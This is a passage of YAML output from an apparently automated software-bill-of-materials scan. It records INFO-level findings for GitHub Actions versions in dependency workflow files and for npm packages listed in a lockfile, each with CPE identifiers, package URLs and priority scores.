|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3e33aad3d5646f4e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/busboy/.github/workflows/ci.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/checkout v2'
|
|
title: actions/checkout v2
|
|
description: 'Package discovered: actions/checkout v2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8939931398f7f376
|
|
name: actions/checkout
|
|
version: v2
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/busboy/.github/workflows/ci.yml
|
|
accessPath: /node_modules/busboy/.github/workflows/ci.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/checkout@v2
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/checkout@v2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c9bdf9f43faeb29d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/busboy/.github/workflows/lint.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/checkout v2'
|
|
title: actions/checkout v2
|
|
description: 'Package discovered: actions/checkout v2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9ed4a1365893a541
|
|
name: actions/checkout
|
|
version: v2
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/busboy/.github/workflows/lint.yml
|
|
accessPath: /node_modules/busboy/.github/workflows/lint.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/checkout@v2
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/checkout@v2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b70772177f81ea1d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/streamsearch/.github/workflows/ci.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/checkout v2'
|
|
title: actions/checkout v2
|
|
description: 'Package discovered: actions/checkout v2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bf473f4674a4b4c1
|
|
name: actions/checkout
|
|
version: v2
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/streamsearch/.github/workflows/ci.yml
|
|
accessPath: /node_modules/streamsearch/.github/workflows/ci.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/checkout@v2
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/checkout@v2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ec35dedecdc67bae
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/streamsearch/.github/workflows/lint.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/checkout v2'
|
|
title: actions/checkout v2
|
|
description: 'Package discovered: actions/checkout v2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7ec5891cc205a593
|
|
name: actions/checkout
|
|
version: v2
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/streamsearch/.github/workflows/lint.yml
|
|
accessPath: /node_modules/streamsearch/.github/workflows/lint.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/checkout@v2
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/checkout@v2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4424fb771af041f1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/stream-shift/.github/workflows/test.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/checkout v3'
|
|
title: actions/checkout v3
|
|
description: 'Package discovered: actions/checkout v3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8effbdc22037c585
|
|
name: actions/checkout
|
|
version: v3
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/stream-shift/.github/workflows/test.yml
|
|
accessPath: /node_modules/stream-shift/.github/workflows/test.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/checkout@v3
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/checkout@v3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a9754521213a3bbe
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/reusify/.github/workflows/ci.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/checkout v4'
|
|
title: actions/checkout v4
|
|
description: 'Package discovered: actions/checkout v4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fd10fce47017fa13
|
|
name: actions/checkout
|
|
version: v4
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/reusify/.github/workflows/ci.yml
|
|
accessPath: /node_modules/reusify/.github/workflows/ci.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/checkout@v4
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/checkout@v4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d2f68bf6461c8bf2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/busboy/.github/workflows/ci.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/setup-node v1'
|
|
title: actions/setup-node v1
|
|
description: 'Package discovered: actions/setup-node v1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6b0792dcccc67817
|
|
name: actions/setup-node
|
|
version: v1
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/busboy/.github/workflows/ci.yml
|
|
accessPath: /node_modules/busboy/.github/workflows/ci.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/setup-node@v1
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/setup-node@v1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e6602c50b5a9ed75
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/busboy/.github/workflows/lint.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/setup-node v1'
|
|
title: actions/setup-node v1
|
|
description: 'Package discovered: actions/setup-node v1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0dc9162b75e9df6b
|
|
name: actions/setup-node
|
|
version: v1
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/busboy/.github/workflows/lint.yml
|
|
accessPath: /node_modules/busboy/.github/workflows/lint.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/setup-node@v1
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/setup-node@v1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 75e343f3c07ad957
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/streamsearch/.github/workflows/ci.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/setup-node v1'
|
|
title: actions/setup-node v1
|
|
description: 'Package discovered: actions/setup-node v1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 303b3812127b618f
|
|
name: actions/setup-node
|
|
version: v1
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/streamsearch/.github/workflows/ci.yml
|
|
accessPath: /node_modules/streamsearch/.github/workflows/ci.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/setup-node@v1
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/setup-node@v1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f81ee12d2fe7942d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/streamsearch/.github/workflows/lint.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/setup-node v1'
|
|
title: actions/setup-node v1
|
|
description: 'Package discovered: actions/setup-node v1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5dcd76ce8f7aa30c
|
|
name: actions/setup-node
|
|
version: v1
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/streamsearch/.github/workflows/lint.yml
|
|
accessPath: /node_modules/streamsearch/.github/workflows/lint.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/setup-node@v1
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/setup-node@v1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f2b699c115f128e7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/setup-node v2'
|
|
title: actions/setup-node v2
|
|
description: 'Package discovered: actions/setup-node v2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 94c6b30301562d90
|
|
name: actions/setup-node
|
|
version: v2
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
|
|
accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/setup-node@v2
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/setup-node@v2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c207c7fc955b5ded
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/stream-shift/.github/workflows/test.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/setup-node v3'
|
|
title: actions/setup-node v3
|
|
description: 'Package discovered: actions/setup-node v3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c1170e00c0039987
|
|
name: actions/setup-node
|
|
version: v3
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/stream-shift/.github/workflows/test.yml
|
|
accessPath: /node_modules/stream-shift/.github/workflows/test.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/setup-node@v3
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/setup-node@v3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 751a614666804651
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/reusify/.github/workflows/ci.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/setup-node v4'
|
|
title: actions/setup-node v4
|
|
description: 'Package discovered: actions/setup-node v4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: de6527b74c32bd7a
|
|
name: actions/setup-node
|
|
version: v4
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/reusify/.github/workflows/ci.yml
|
|
accessPath: /node_modules/reusify/.github/workflows/ci.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/setup-node@v4
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/setup-node@v4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 87ee223622bbf049
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: agent-base 6.0.2'
|
|
title: agent-base 6.0.2
|
|
description: 'Package discovered: agent-base 6.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 12d1ed2dd95a1a7c
|
|
name: agent-base
|
|
version: 6.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:agent-base:agent-base:6.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:agent-base:agent_base:6.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:agent_base:agent-base:6.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:agent_base:agent_base:6.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:agent:agent-base:6.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:agent:agent_base:6.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/agent-base@6.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz
|
|
integrity: sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==
|
|
dependencies:
|
|
debug: '4'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3360c58589af5938
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: agent-base 7.1.4'
|
|
title: agent-base 7.1.4
|
|
description: 'Package discovered: agent-base 7.1.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f7259be6132b188d
|
|
name: agent-base
|
|
version: 7.1.4
|
|
